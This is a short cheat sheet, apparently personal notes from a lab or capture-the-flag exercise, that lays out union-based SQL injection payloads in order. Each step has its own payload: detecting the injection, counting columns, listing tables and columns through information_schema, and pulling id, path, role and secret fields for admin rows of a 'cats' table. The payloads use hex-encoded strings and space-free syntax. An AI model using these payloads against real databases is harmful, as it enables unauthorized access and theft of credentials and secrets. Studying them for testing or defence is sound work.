Union based:

---> find sqli

id=1 group by 99

---> find number of columns

id=(null)union(select(1),2,3,4)

---> find the tables

id=(null)union(select(1),group_concat(table_name),3,(4)from(information_schema.tables)where(table_schema)like(database()))

---> find the columns

id=(null)union(select(1),group_concat(column_name),3,(4)from(information_schema.columns)where(table_name)like(0x63617473))

---> get the data

id=(null)union(select(1),group_concat(id,path,role,secret),3,(4)from(cats)where(role)like(0x61646d696e))
